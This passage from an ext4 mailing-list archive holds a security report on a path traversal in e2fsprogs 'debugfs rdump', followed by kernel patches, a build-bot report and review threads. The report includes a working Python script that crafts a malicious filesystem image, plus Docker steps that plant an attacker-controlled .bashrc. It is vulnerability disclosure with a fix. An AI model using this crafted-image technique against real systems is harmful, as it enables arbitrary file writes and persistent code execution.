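crafted = make_sb(6, 262145, 16384)   # values from the PoC
ordinary = make_sb(2, 8192, 256)      # a typical 4K-block geometry

print(inode_table_size_overflows(crafted))    # True
print(inode_table_size_overflows(ordinary))   # False
```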

## Timeline

- 2026-06-07: Bug discovered during security audit

[-- Warning: decoded text below may be mangled, UTF-8 assumed --]
[-- Attachment #5: REPORT-path-traversal.md --]
[-- Type: text/markdown; name="REPORT-path-traversal.md", Size: 5700 bytes --]

# e2fsprogs: Path Traversal in debugfs rdump allows arbitrary file write

## Summary

`debugfs rdump` extracts files from an ext2/ext3/ext4 filesystem image
to a local directory. Directory entry names read from the on-disk image
are not sanitized for path traversal sequences (`../`). An attacker who
provides a crafted filesystem image can cause files to be written to
arbitrary locations outside the intended extraction directory when the
victim runs `rdump`.

## Affected Component

- File: `debugfs/dump.c`, function `rdump_inode()`, line 265
- Also affects `rdump_symlink()` at line 242 (symlink target from image
  used directly in `symlink()` syscall)
- Versions: all current versions including 1.47.4

## Severity

**High** — Arbitrary file write as the user running debugfs. If run as
root (common for filesystem recovery), this is full system compromise.

## Root Cause

In `rdump_inode()`, the output path is constructed by concatenating the
dump root with the directory entry name from the filesystem image:

```c
// debugfs/dump.c:265
sprintf(fullname, "%s/%s", dumproot, name);
```

The `name` variable comes from `rdump_dirent()` which reads it directly
from the on-disk `ext2_dir_entry.name` field (line 317):

```c
// debugfs/dump.c:316-318
thislen = ext2fs_dirent_name_len(dirent);
strncpy(name, dirent->name, thislen);
name[thislen] = 0;
```

No validation is performed to reject names containing `/`, `..`, or
absolute paths. When `name` is `../../etc/cron.d/evil`, the resulting
`fullname` resolves outside the dump directory.
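
The escape is easy to see by building the same string in Python and
normalising it. This is only a lexical illustration: `posixpath.normpath`
collapses `..` textually, whereas the kernel resolves the path through
the real directory tree, so symlinks on the host could change the
outcome. The dump root `/tmp/safe_dir` is an example value.

```python
import posixpath

dumproot = "/tmp/safe_dir"
name = "../../etc/cron.d/evil"

# Same format string as the sprintf() call in rdump_inode().
fullname = "%s/%s" % (dumproot, name)
resolved = posixpath.normpath(fullname)
escaped = not resolved.startswith(dumproot + "/")

print(fullname)   # /tmp/safe_dir/../../etc/cron.d/evil
print(resolved)   # /etc/cron.d/evil
print(escaped)    # True
```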

Additionally, `rdump_symlink()` at line 242 creates a native symlink
whose target is read from the crafted image:

```c
// debugfs/dump.c:242
if (symlink(buf, fullname) == -1) { ... }
```

This allows the attacker to also create arbitrary symlinks on the host.

## Impact

An attacker crafts a filesystem image (e.g., on a USB drive or disk
image file) containing directory entries with `../` sequences in their
names. When a user extracts the image with
`debugfs <image> -R "rdump / <dir>"`, the attacker's files are written
outside the extraction directory.

Attack scenarios:
- Plant a `.bashrc` / `.profile` in the user's home directory
- Write to `/etc/cron.d/` for persistent code execution (if run as root)
- Overwrite `~/.ssh/authorized_keys` for SSH access
- Create malicious symlinks to redirect future operations

## Proof of Concept

### Setup

Build the Docker reproduction environment:

```bash
cd <e2fsprogs-source>
docker build -f Dockerfile.repro -t e2fsprogs-repro .
docker build -f Dockerfile.victim -t e2fs-victim .
```

### Reproduction

```bash
docker run --rm -it e2fs-victim
```

Inside the container:

```bash
# Check home directory — clean
ls -la /home/victim/

# Extract "USB drive" filesystem
/src/debugfs/debugfs /usb/drive.img -R "rdump / /home/victim/extracted"

# Check again — .bashrc appeared OUTSIDE extracted/
ls -la /home/victim/
cat /home/victim/.bashrc
```

**Result:** A `.bashrc` file with attacker-controlled content appears in
`/home/victim/`, not in `/home/victim/extracted/`. The crafted directory
entry `../.bashrc` escaped the dump directory.

### Manual image crafting (without Docker)

```python
#!/usr/bin/env python3
"""Craft ext2 image with path traversal directory entry."""
import struct, subprocess, sys

IMG = sys.argv[1]

# Create normal ext2 image
subprocess.run(['mke2fs', '-t', 'ext2', '-F', '-b', '1024', '-N', '128',
                '-O', '^dir_index', IMG, '4096'], check=True, capture_output=True)

# Write a payload file
with open('/tmp/_payload', 'w') as f:
    f.write('#!/bin/bash\necho PWNED\n')
subprocess.run(['debugfs', '-w', IMG, '-R', 'write /tmp/_payload testfile'],
               capture_output=True)

# Patch directory entry: rename "testfile" → "../../tmp/escaped"
with open(IMG, 'r+b') as f:
    f.seek(1024)
    sb = f.read(1024)
    bs = 1024 << struct.unpack_from('<I', sb, 24)[0]
    isz = struct.unpack_from('<H', sb, 88)[0]
    gd_off = bs * 2 if bs == 1024 else bs
    f.seek(gd_off)
    gd = f.read(64)
    itable = struct.unpack_from('<I', gd, 8)[0]
    f.seek(itable * bs + isz)  # root inode
    ri = f.read(isz)
    rblk = struct.unpack_from('<I', ri, 40)[0]
    f.seek(rblk * bs)
    dd = bytearray(f.read(bs))
    pos = 0
    while pos < bs:
        rl = struct.unpack_from('<H', dd, pos+4)[0]
        nl = dd[pos+6]
        if dd[pos+8:pos+8+nl] == b'testfile':
            evil = b'../../tmp/escaped'
            dd[pos+6] = len(evil)
            dd[pos+8:pos+8+len(evil)] = evil
            break
        if pos + rl >= bs: break
        pos += rl
    f.seek(rblk * bs)
    f.write(dd)

# Trigger: debugfs <IMG> -R "rdump / /tmp/safe"
# Result: /tmp/escaped is created outside /tmp/safe/
```

## Suggested Fix

Validate directory entry names in `rdump_dirent()` and `rdump_inode()`
before using them to construct host filesystem paths. Reject names
containing:
- `/` (slash) anywhere in the name
- `..` as a path component
- NUL bytes

Additionally, validate symlink targets in `rdump_symlink()` to prevent
creating symlinks pointing outside the extraction directory.

Example fix for `rdump_dirent()`:

```c
static int rdump_dirent(struct ext2_dir_entry *dirent, ...) {
    ...
    thislen = ext2fs_dirent_name_len(dirent);
    strncpy(name, dirent->name, thislen);
    name[thislen] = 0;

    /* Reject path traversal in directory entry names */
    if (strchr(name, '/') || strcmp(name, "..") == 0 ||
        strstr(name, "../") || strstr(name, "/..")) {
        com_err("rdump", 0,
                "skipping entry with path traversal: %s", name);
        return 0;
    }
    ...
}
```
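
The rejection rules listed above can be prototyped in Python before
committing to a C implementation. The function name
`is_safe_dirent_name` is hypothetical. The sketch treats a name as a
single path component, so once `/` is rejected the only remaining
traversal names are `.` and `..` themselves; the `strstr()` checks in
the C example are then covered by the slash check.

```python
def is_safe_dirent_name(name: bytes) -> bool:
    """Return True if `name` is usable as a single host path component."""
    if not name or name in (b".", b".."):
        return False
    # A directory entry name must never contain a separator or a NUL.
    return b"/" not in name and b"\x00" not in name


for candidate in (b"testfile", b"..hidden", b"..", b"../.bashrc",
                  b"../../tmp/escaped", b"/etc/passwd", b"a\x00b"):
    print(candidate, is_safe_dirent_name(candidate))
```

Names such as `..hidden` are accepted because they contain no separator
and are therefore ordinary file names.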

## Timeline

- 2026-06-07: Bug discovered during security audit

^ permalink raw reply

* [RFC PATCH] ext4: fix false-negative overwrite check for DIO spanning extent boundaries
From: Peng Wang @ 2026-06-07 12:49 UTC (permalink / raw)
  To: tytso, adilger.kernel, libaokun, jack, ojaswin, ritesh.list,
	yi.zhang
  Cc: linux-ext4, linux-kernel, Peng Wang

ext4_overwrite_io() decides whether a direct I/O write is an overwrite
(all target blocks already allocated) so the write can proceed under a
shared inode lock.  It calls ext4_map_blocks() once and returns false
if the mapped length is shorter than the requested length.

ext4_map_blocks() maps at most one extent per call.  When a write
straddles two extents (e.g. a written extent and an adjacent unwritten
extent created by fallocate), the single call returns only the first
extent's length.  ext4_overwrite_io() then mis-classifies the write as
non-overwrite and forces the caller to cycle i_rwsem from shared to
exclusive.

On workloads where a DIO writer appends through a fallocated region
while a DIO reader tails the same file, every write that crosses a
written/unwritten extent boundary triggers an exclusive lock
acquisition.  The writer must wait for the reader's shared lock to be
released, and while waiting the RWSEM_FLAG_WAITERS bit blocks all
other shared acquirers.  This serialises all writers to queue-depth 1
and throughput collapses.

Fix by looping ext4_map_blocks() over the remaining range.  As long as
every queried extent reports allocated blocks (written or unwritten),
the function returns true and the write keeps the shared lock.

The *unwritten output now uses OR semantics across extents: set if any
block in the range is unwritten.  This is correct for the two callers:

 - (unaligned_io && unwritten) takes the exclusive lock, which is
   needed if any block requires partial-block zeroing.
 - (ilock_shared && !unwritten) selects ext4_iomap_overwrite_ops,
   which skips journal transactions and is only safe when every block
   is written/mapped.

The loop adds at most one extra ext4_map_blocks() call per extent
boundary, which is negligible compared to the lock contention it
eliminates.

Reproducer: two threads doing O_DIRECT I/O on a fallocated ext4 file.
Thread 1 appends sequentially in 4-16 KB writes.  Thread 2 reads from
the tail of the file in up to 1 MB reads.  Both use the same fd with
the file preallocated via posix_fallocate().

Tested on ext4 over NVMe, 6.6 based kernel:

                              before          after
  writer-only throughput:     399 MB/s        412 MB/s
  mixed (writer + reader):     11 MB/s        381 MB/s
  write latency (mixed):     880 us            21 us
  rwsem_down_write_slowpath
   (5 s sample, mixed):       1792              2

Signed-off-by: Peng Wang <peng_wang@linux.alibaba.com>
---
 fs/ext4/file.c | 25 ++++++++++++++++---------
 1 file changed, 16 insertions(+), 9 deletions(-)

diff --git a/fs/ext4/file.c b/fs/ext4/file.c
index eb1a323962b1..d060de8eddac 100644
--- a/fs/ext4/file.c
+++ b/fs/ext4/file.c
@@ -228,15 +228,22 @@ static bool ext4_overwrite_io(struct inode *inode,
 	map.m_len = EXT4_MAX_BLOCKS(len, pos, blkbits);
 	blklen = map.m_len;
 
-	err = ext4_map_blocks(NULL, inode, &map, 0);
-	if (err != blklen)
-		return false;
-	/*
-	 * 'err==len' means that all of the blocks have been preallocated,
-	 * regardless of whether they have been initialized or not. We need to
-	 * check m_flags to distinguish the unwritten extents.
-	 */
-	*unwritten = !(map.m_flags & EXT4_MAP_MAPPED);
+	*unwritten = false;
+
+	while (blklen > 0) {
+		map.m_len = blklen;
+		err = ext4_map_blocks(NULL, inode, &map, 0);
+		/*
+		 * err <= 0 means a hole or error; the write needs block
+		 * allocation so it cannot be treated as an overwrite.
+		 */
+		if (err <= 0)
+			return false;
+		if (!(map.m_flags & EXT4_MAP_MAPPED))
+			*unwritten = true;
+		blklen -= err;
+		map.m_lblk += err;
+	}
 	return true;
 }
 
-- 
2.43.0


^ permalink raw reply related

* [tytso-ext4:dev] BUILD SUCCESS 3ca1d19c1971ac4f25478eafb741e726bf2d5954
From: kernel test robot @ 2026-06-06  2:03 UTC (permalink / raw)
  To: Theodore Ts'o; +Cc: linux-ext4

tree/branch: https://git.kernel.org/pub/scm/linux/kernel/git/tytso/ext4.git dev
branch HEAD: 3ca1d19c1971ac4f25478eafb741e726bf2d5954  ext4: improve str2hashbuf by processing 4-byte chunks and removing function pointers

elapsed time: 1717m

configs tested: 180
configs skipped: 15

The following configs have been built successfully.
More configs may be tested in the coming days.

tested configs:
alpha                             allnoconfig    gcc-15.2.0
alpha                            allyesconfig    gcc-16.1.0
alpha                               defconfig    gcc-16.1.0
arc                               allnoconfig    gcc-15.2.0
arc                              allyesconfig    gcc-15.2.0
arc                                 defconfig    gcc-16.1.0
arc                            randconfig-001    gcc-8.5.0
arc                   randconfig-001-20260605    gcc-8.5.0
arc                            randconfig-002    gcc-8.5.0
arc                   randconfig-002-20260605    gcc-9.5.0
arm                               allnoconfig    clang-23
arm                                 defconfig    clang-23
arm                            randconfig-001    gcc-16.1.0
arm                   randconfig-001-20260605    gcc-13.4.0
arm                            randconfig-002    gcc-15.2.0
arm                   randconfig-002-20260605    gcc-8.5.0
arm                            randconfig-003    clang-23
arm                   randconfig-003-20260605    clang-23
arm                            randconfig-004    gcc-13.4.0
arm                   randconfig-004-20260605    gcc-15.2.0
arm64                            allmodconfig    clang-19
arm64                             allnoconfig    gcc-15.2.0
arm64                               defconfig    gcc-16.1.0
arm64                 randconfig-001-20260605    gcc-9.5.0
arm64                 randconfig-002-20260605    gcc-10.5.0
arm64                 randconfig-003-20260605    gcc-11.5.0
arm64                 randconfig-004-20260605    clang-23
csky                             allmodconfig    gcc-15.2.0
csky                              allnoconfig    gcc-15.2.0
csky                                defconfig    gcc-16.1.0
csky                  randconfig-001-20260605    gcc-16.1.0
csky                  randconfig-002-20260605    gcc-9.5.0
hexagon                          allmodconfig    clang-23
hexagon                           allnoconfig    clang-23
hexagon                             defconfig    clang-23
hexagon               randconfig-001-20260605    clang-20
hexagon               randconfig-002-20260605    clang-23
i386                             allmodconfig    gcc-14
i386                              allnoconfig    gcc-14
i386                             allyesconfig    gcc-14
i386                 buildonly-randconfig-001    gcc-14
i386        buildonly-randconfig-001-20260605    clang-22
i386                 buildonly-randconfig-002    clang-22
i386        buildonly-randconfig-002-20260605    clang-22
i386                 buildonly-randconfig-003    clang-22
i386        buildonly-randconfig-003-20260605    clang-22
i386                 buildonly-randconfig-004    gcc-14
i386        buildonly-randconfig-004-20260605    clang-22
i386                 buildonly-randconfig-005    gcc-14
i386        buildonly-randconfig-005-20260605    gcc-12
i386                 buildonly-randconfig-006    gcc-14
i386        buildonly-randconfig-006-20260605    gcc-14
i386                                defconfig    clang-22
i386                  randconfig-001-20260605    clang-20
i386                  randconfig-002-20260605    clang-20
i386                  randconfig-003-20260605    gcc-14
i386                  randconfig-004-20260605    gcc-14
i386                  randconfig-005-20260605    clang-20
i386                  randconfig-006-20260605    gcc-14
i386                  randconfig-007-20260605    clang-20
i386                  randconfig-011-20260605    clang-22
i386                  randconfig-012-20260605    clang-22
i386                  randconfig-013-20260605    clang-22
i386                  randconfig-014-20260605    clang-22
i386                  randconfig-015-20260605    clang-22
i386                  randconfig-016-20260605    clang-22
i386                  randconfig-017-20260605    clang-22
loongarch                        allmodconfig    clang-19
loongarch                         allnoconfig    clang-23
loongarch                           defconfig    clang-23
loongarch             randconfig-001-20260605    clang-18
loongarch             randconfig-002-20260605    gcc-16.1.0
m68k                             allmodconfig    gcc-15.2.0
m68k                              allnoconfig    gcc-15.2.0
m68k                             allyesconfig    gcc-16.1.0
m68k                                defconfig    gcc-16.1.0
microblaze                        allnoconfig    gcc-15.2.0
microblaze                       allyesconfig    gcc-15.2.0
microblaze                          defconfig    gcc-16.1.0
mips                             allmodconfig    gcc-15.2.0
mips                              allnoconfig    gcc-15.2.0
mips                             allyesconfig    gcc-15.2.0
nios2                            allmodconfig    gcc-11.5.0
nios2                             allnoconfig    gcc-11.5.0
nios2                               defconfig    gcc-11.5.0
nios2                 randconfig-001-20260605    gcc-8.5.0
nios2                 randconfig-002-20260605    gcc-8.5.0
openrisc                         allmodconfig    gcc-15.2.0
openrisc                          allnoconfig    gcc-15.2.0
openrisc                            defconfig    gcc-16.1.0
parisc                           allmodconfig    gcc-15.2.0
parisc                            allnoconfig    gcc-15.2.0
parisc                           allyesconfig    gcc-15.2.0
parisc                              defconfig    gcc-16.1.0
parisc                randconfig-001-20260605    gcc-14.3.0
parisc                randconfig-002-20260605    gcc-12.5.0
parisc64                            defconfig    gcc-16.1.0
powerpc                          allmodconfig    gcc-15.2.0
powerpc                           allnoconfig    gcc-15.2.0
powerpc               randconfig-001-20260605    gcc-8.5.0
powerpc               randconfig-002-20260605    gcc-8.5.0
powerpc64             randconfig-001-20260605    clang-23
powerpc64             randconfig-002-20260605    gcc-8.5.0
riscv                             allnoconfig    gcc-15.2.0
riscv                               defconfig    clang-23
riscv                          randconfig-001    gcc-8.5.0
riscv                 randconfig-001-20260605    gcc-8.5.0
riscv                          randconfig-002    clang-23
riscv                 randconfig-002-20260605    clang-23
s390                             allmodconfig    clang-18
s390                              allnoconfig    clang-23
s390                             allyesconfig    gcc-15.2.0
s390                                defconfig    clang-18
s390                           randconfig-001    gcc-11.5.0
s390                  randconfig-001-20260605    clang-23
s390                           randconfig-002    clang-23
s390                  randconfig-002-20260605    clang-23
sh                               allmodconfig    gcc-16.1.0
sh                                allnoconfig    gcc-15.2.0
sh                               allyesconfig    gcc-15.2.0
sh                                  defconfig    gcc-16.1.0
sh                             randconfig-001    gcc-16.1.0
sh                    randconfig-001-20260605    gcc-16.1.0
sh                             randconfig-002    gcc-14.3.0
sh                    randconfig-002-20260605    gcc-10.5.0
sparc                             allnoconfig    gcc-15.2.0
sparc                               defconfig    gcc-16.1.0
sparc                 randconfig-001-20260605    gcc-15.2.0
sparc                 randconfig-002-20260605    gcc-16.1.0
sparc64                          allmodconfig    clang-23
sparc64                             defconfig    clang-23
sparc64               randconfig-001-20260605    clang-23
sparc64               randconfig-002-20260605    clang-23
um                               allmodconfig    clang-19
um                                allnoconfig    clang-23
um                               allyesconfig    gcc-14
um                                  defconfig    clang-23
um                             i386_defconfig    gcc-14
um                    randconfig-001-20260605    clang-19
um                    randconfig-002-20260605    clang-23
um                           x86_64_defconfig    clang-23
x86_64                           allmodconfig    clang-22
x86_64                            allnoconfig    clang-20
x86_64                           allyesconfig    clang-22
x86_64               buildonly-randconfig-001    gcc-12
x86_64      buildonly-randconfig-001-20260605    gcc-14
x86_64               buildonly-randconfig-002    clang-20
x86_64      buildonly-randconfig-002-20260605    gcc-14
x86_64               buildonly-randconfig-003    gcc-14
x86_64      buildonly-randconfig-003-20260605    gcc-14
x86_64               buildonly-randconfig-004    gcc-14
x86_64      buildonly-randconfig-004-20260605    gcc-14
x86_64               buildonly-randconfig-005    gcc-14
x86_64      buildonly-randconfig-005-20260605    gcc-14
x86_64               buildonly-randconfig-006    clang-20
x86_64      buildonly-randconfig-006-20260605    gcc-14
x86_64                              defconfig    gcc-14
x86_64                randconfig-001-20260605    clang-22
x86_64                randconfig-002-20260605    clang-22
x86_64                randconfig-003-20260605    clang-22
x86_64                randconfig-004-20260605    gcc-13
x86_64                randconfig-005-20260605    clang-22
x86_64                randconfig-006-20260605    gcc-14
x86_64                randconfig-011-20260605    clang-22
x86_64                randconfig-012-20260605    gcc-14
x86_64                randconfig-013-20260605    clang-22
x86_64                randconfig-014-20260605    clang-22
x86_64                randconfig-015-20260605    gcc-14
x86_64                randconfig-016-20260605    clang-22
x86_64                randconfig-071-20260605    gcc-14
x86_64                randconfig-072-20260605    gcc-14
x86_64                randconfig-073-20260605    clang-20
x86_64                randconfig-074-20260605    gcc-14
x86_64                randconfig-075-20260605    gcc-12
x86_64                randconfig-076-20260605    gcc-14
x86_64                          rhel-9.4-rust    clang-22
xtensa                           alldefconfig    gcc-16.1.0
xtensa                            allnoconfig    gcc-15.2.0
xtensa                randconfig-001-20260605    gcc-8.5.0
xtensa                randconfig-002-20260605    gcc-8.5.0

--
0-DAY CI Kernel Test Service
https://github.com/intel/lkp-tests/wiki

* Re: [PATCH 10/17] jbd2: replace __get_free_pages() with kmalloc()
From: Matthew Wilcox @ 2026-06-05 20:54 UTC (permalink / raw)
  To: David Laight
  Cc: Theodore Tso, Mike Rapoport, Jan Kara, Mark Fasheh, Joel Becker,
	Joseph Qi, Ryusuke Konishi, Viacheslav Dubeyko, Trond Myklebust,
	Anna Schumaker, Chuck Lever, Jeff Layton, NeilBrown,
	Olga Kornievskaia, Dai Ngo, Tom Talpey, Alexander Viro,
	Christian Brauner, Jan Kara, Dave Kleikamp, Miklos Szeredi,
	Andreas Hindborg, Breno Leitao, Kees Cook, Tigran A. Aivazian,
	linux-kernel, linux-fsdevel, ocfs2-devel, linux-nilfs, linux-nfs,
	jfs-discussion, linux-ext4, linux-mm
In-Reply-To: <20260605093332.7b067876@pumpkin>

On Fri, Jun 05, 2026 at 09:33:32AM +0100, David Laight wrote:
> On Thu, 4 Jun 2026 10:05:52 -0400
> "Theodore Tso" <tytso@mit.edu> wrote:
> 
> ...
> > I suppose we could do it with kmalloc() with some flags to
> > prevent forced reclaim / compaction, and if that fails, then fall back
> > to vmalloc().  Is there a better way?
> 
> There is already kvalloc().
> I'm not sure how hard that tries to get kmalloc() to succeed.

Please don't try to help.

* Re: [PATCH 00/17] replace __get_free_pages() call with kmalloc()
From: Zi Yan @ 2026-06-05 20:00 UTC (permalink / raw)
  To: Mike Rapoport (Microsoft)
  Cc: Jan Kara, Mark Fasheh, Joel Becker, Joseph Qi, Ryusuke Konishi,
	Viacheslav Dubeyko, Trond Myklebust, Anna Schumaker, Chuck Lever,
	Jeff Layton, NeilBrown, Olga Kornievskaia, Dai Ngo, Tom Talpey,
	Alexander Viro, Christian Brauner, Jan Kara, Dave Kleikamp,
	Theodore Ts'o, Miklos Szeredi, Andreas Hindborg, Breno Leitao,
	Kees Cook, Tigran A. Aivazian, linux-kernel, linux-fsdevel,
	ocfs2-devel, linux-nilfs, linux-nfs, jfs-discussion, linux-ext4,
	linux-mm
In-Reply-To: <20260523-b4-fs-v1-0-275e36a83f0e@kernel.org>

On 23 May 2026, at 13:54, Mike Rapoport (Microsoft) wrote:

> This is a (small) part of larger work of replacing page allocator calls
> with kmalloc.

Is the goal to get rid of __get_free_page(s)()?

Thanks.

>
> Also in git:
> https://git.kernel.org/pub/scm/linux/kernel/git/rppt/linux.git gfp-to-kmalloc/fs
>
> Signed-off-by: Mike Rapoport (Microsoft) <rppt@kernel.org>
> ---
> Mike Rapoport (Microsoft) (17):
>       quota: allocate dquot_hash with kmalloc()
>       proc: replace __get_free_page() with kmalloc()
>       ocfs2/dlm: replace __get_free_page() with kmalloc()
>       nilfs2: replace get_zeroed_page() with kzalloc()
>       NFS: replace __get_free_page() with kmalloc() in nfs_show_devname()
>       NFS: remove unused page and page2 in nfs4_replace_transport()
>       NFSD: replace __get_free_page() with kmalloc() in nfsd_buffered_readdir()
>       libfs: simple_transaction_get(): replace get_zeroed_page() with kzalloc()
>       jfs: replace __get_free_page() with kmalloc()
>       jbd2: replace __get_free_pages() with kmalloc()
>       isofs: replace __get_free_page() with kmalloc()
>       fuse: replace __get_free_page() with kmalloc()
>       fs/select: replace __get_free_page() with kmalloc()
>       fs/namespace: use __getname() to allocate mntpath buffer
>       configfs: replace __get_free_pages() with kzalloc()
>       binfmt_misc: replace __get_free_page() with kmalloc()
>       bfs: replace get_zeroed_page() with kzalloc()
>
>  fs/bfs/inode.c             |  4 ++--
>  fs/binfmt_misc.c           |  4 ++--
>  fs/configfs/file.c         |  7 +++----
>  fs/fuse/ioctl.c            |  5 +++--
>  fs/isofs/dir.c             |  5 +++--
>  fs/jbd2/journal.c          |  7 ++-----
>  fs/jfs/jfs_dtree.c         | 16 ++++++++--------
>  fs/libfs.c                 |  6 +++---
>  fs/namespace.c             |  4 ++--
>  fs/nfs/nfs4namespace.c     | 15 +--------------
>  fs/nfs/super.c             |  4 ++--
>  fs/nfsd/vfs.c              |  4 ++--
>  fs/nilfs2/ioctl.c          |  4 ++--
>  fs/ocfs2/dlm/dlmdebug.c    | 24 +++++++++---------------
>  fs/ocfs2/dlm/dlmdomain.c   |  8 +++++---
>  fs/ocfs2/dlm/dlmmaster.c   |  5 ++---
>  fs/ocfs2/dlm/dlmrecovery.c |  4 ++--
>  fs/proc/base.c             | 16 ++++++++--------
>  fs/quota/dquot.c           | 11 +++++------
>  fs/select.c                |  4 ++--
>  20 files changed, 68 insertions(+), 89 deletions(-)
> ---
> base-commit: 5d6919055dec134de3c40167a490f33c74c12581
> change-id: 20260522-b4-fs-5e5c70f31664
>
> Best regards,
> --
> Sincerely yours,
> Mike.


Best Regards,
Yan, Zi

* Re: [PATCH] ext4: avoid full buffer walks for large folio partial writes
From: Matthew Wilcox @ 2026-06-05 14:24 UTC (permalink / raw)
  To: Jia Zhu
  Cc: Theodore Ts'o, Andreas Dilger, Alexander Viro,
	Christian Brauner, Jan Kara, Baokun Li, Ojaswin Mujoo,
	Ritesh Harjani, Zhang Yi, linux-ext4, linux-fsdevel, linux-kernel
In-Reply-To: <20260605090253.32822-1-zhujia.zj@bytedance.com>

On Fri, Jun 05, 2026 at 05:02:53PM +0800, Jia Zhu wrote:
> On Wed, Jun 03, 2026 at 07:11:48PM +0100, Matthew Wilcox wrote:
> > Is this a common case for you, or is this something you noticed by
> > inspection?
> 
> This was found by our kernel release benchmark.  We run libMicro as part
> of that test suite:
> 
>   https://github.com/rzezeski/libMicro
> 
> The regression shows up in buffered write/pwrite/writev overwrite tests
> on ext4 large folios.

Makes sense.  I'll assume this can correspond to a reasonable workload.
It certainly seems like something that could exist.

> > Wouldn't you get just as much benefit from this?
> 
> Yes.  I tested this approach, and it gives almost the same result as my
> original partial-commit helper.

Excellent!  Obviously it'd be even better if we didn't have to walk the
leading buffer_heads ... but there's no way to do this with the data
structure we have.

> Agreed.  The original ext4_block_write_begin() change was too aggressive.
> Seeking directly to @from also skips the prefix buffers, which makes the
> old side effects harder to prove.
> 
> For v2 I plan to drop that part and keep the existing walk from the head.
> The ext4 change would only stop after @to when the folio was already
> uptodate on entry, similar to your block_commit_write() suggestion:
> 
> +       bool folio_uptodate = folio_test_uptodate(folio);
> +
>         for (bh = head, block_start = 0;
> -            bh != head || !block_start;
> +            (bh != head || !block_start) &&
> +            (!folio_uptodate || block_start < to);
>              block++, block_start = block_end, bh = bh->b_this_page) {
>                 ...
>         }

Yes, I think that's a good approach.

> So the prefix path and all in-range handling stay unchanged.  The only
> skipped work is the tail part after @to, and only for a folio that was
> already uptodate before write_begin() started.
> 
> > ... converting ext4 to use iomap instead of buffer heads.
> 
> I strongly agree that iomap is the right direction for ext4.  The iomap
> buffered write path would make this particular buffer-head walk cost go
> away.
> 
> The reason I am still looking at this path is that the regression is
> visible in our LTS upgrade testing from 6.12 to 6.18.  It was introduced
> by the ext4 large-folio enablement in v6.16.  For example, in our
> libMicro release benchmark with THP always enabled, usecs/call, lower is
> better:
> 
> case        v6.12        v6.18        regression
> write_u1k   0.609        4.659        +665.0%
> write_u10k  1.408        4.869        +245.8%

Ouch ;-)  No wonder you want to address this.  Do you recover all the
regression with this fix?

> The iomap conversion is the long-term fix, but it does not help kernels
> which still use the buffer-head buffered write path.  I would like to keep
> this as a small regression fix for that path, and make it minimal enough
> to be suitable for stable/LTS backport.

Is it that you're using some ext4 features that aren't supported by
iomap yet?  Could you say which ones?  That might motivate someone to
prioritise that support.

> Would this v2 direction look OK to you?

Absolutely.  Very happy with this approach.

* Re: [PATCH 10/17] jbd2: replace __get_free_pages() with kmalloc()
From: Uladzislau Rezki @ 2026-06-05  9:50 UTC (permalink / raw)
  To: David Laight
  Cc: Theodore Tso, Mike Rapoport, Jan Kara, Mark Fasheh, Joel Becker,
	Joseph Qi, Ryusuke Konishi, Viacheslav Dubeyko, Trond Myklebust,
	Anna Schumaker, Chuck Lever, Jeff Layton, NeilBrown,
	Olga Kornievskaia, Dai Ngo, Tom Talpey, Alexander Viro,
	Christian Brauner, Jan Kara, Dave Kleikamp, Miklos Szeredi,
	Andreas Hindborg, Breno Leitao, Kees Cook, Tigran A. Aivazian,
	linux-kernel, linux-fsdevel, ocfs2-devel, linux-nilfs, linux-nfs,
	jfs-discussion, linux-ext4, linux-mm
In-Reply-To: <20260605093332.7b067876@pumpkin>

On Fri, Jun 05, 2026 at 09:33:32AM +0100, David Laight wrote:
> On Thu, 4 Jun 2026 10:05:52 -0400
> "Theodore Tso" <tytso@mit.edu> wrote:
> 
> ...
> > I suppose we could do it with kmalloc() with some flags to
> > prevent forced reclaim / compaction, and if that fails, then fall back
> > to vmalloc().  Is there a better way?
> 
> There is already kvalloc().
> I'm not sure how hard that tries to get kmalloc() to succeed.
> 
I assume you mean kvmalloc()? kvalloc() is something unknown to me.
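
For reference, my understanding is that kvmalloc() has the shape Ted
describes: attempt a contiguous allocation without pushing reclaim hard,
and fall back to vmalloc() if that fails.  Below is a userspace model of
that shape only, not the kernel implementation.  The stub allocators,
the contig_limit parameter, and every name in it are hypothetical.

```c
#include <stddef.h>
#include <stdlib.h>

/* Which allocator satisfied the request (illustrative only). */
enum alloc_path { PATH_NONE, PATH_CONTIG, PATH_FALLBACK };

/*
 * Stub for a "do not try hard" contiguous allocation.  It simply
 * refuses anything above contig_limit to mimic a failed attempt.
 */
static void *contig_alloc_noretry(size_t size, size_t contig_limit)
{
	if (size > contig_limit)
		return NULL;
	return malloc(size);
}

/* Stub for the vmalloc()-like fallback. */
static void *fallback_alloc(size_t size)
{
	return malloc(size);
}

/* Try the cheap contiguous path first, then fall back. */
static void *kv_alloc_model(size_t size, size_t contig_limit,
			    enum alloc_path *path)
{
	void *p = contig_alloc_noretry(size, contig_limit);

	if (p) {
		*path = PATH_CONTIG;
		return p;
	}
	p = fallback_alloc(size);
	*path = p ? PATH_FALLBACK : PATH_NONE;
	return p;
}
```

In this model the caller never needs to know which path was taken, which
is the property that matters for the jbd2 case.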

--
Uladzislau Rezki

* Re: [PATCH] ext4: avoid full buffer walks for large folio partial writes
From: Jia Zhu @ 2026-06-05  9:02 UTC (permalink / raw)
  To: Matthew Wilcox
  Cc: Jia Zhu, Theodore Ts'o, Andreas Dilger, Alexander Viro,
	Christian Brauner, Jan Kara, Baokun Li, Ojaswin Mujoo,
	Ritesh Harjani, Zhang Yi, linux-ext4, linux-fsdevel, linux-kernel
In-Reply-To: <aiBuZE5NWMfOGAA6@casper.infradead.org>

On Wed, Jun 03, 2026 at 07:11:48PM +0100, Matthew Wilcox wrote:
> Is this a common case for you, or is this something you noticed by
> inspection?

This was found by our kernel release benchmark.  We run libMicro as part
of that test suite:

  https://github.com/rzezeski/libMicro

The regression shows up in buffered write/pwrite/writev overwrite tests
on ext4 large folios.

> Wouldn't you get just as much benefit from this?

Yes.  I tested this approach, and it gives almost the same result as my
original partial-commit helper.

I agree this is a better direction for block_commit_write().  It keeps the
existing buffer-head state handling and only stops the tail walk after an
already-uptodate folio has been committed through @to.  That removes the
main large-folio cost in our small-overwrite benchmark while keeping the
change much closer to the old code.

> I'm unconvinced that this is safe ...

Agreed.  The original ext4_block_write_begin() change was too aggressive.
Seeking directly to @from also skips the prefix buffers, which makes the
old side effects harder to prove.

For v2 I plan to drop that part and keep the existing walk from the head.
The ext4 change would only stop after @to when the folio was already
uptodate on entry, similar to your block_commit_write() suggestion:

+       bool folio_uptodate = folio_test_uptodate(folio);
+
        for (bh = head, block_start = 0;
-            bh != head || !block_start;
+            (bh != head || !block_start) &&
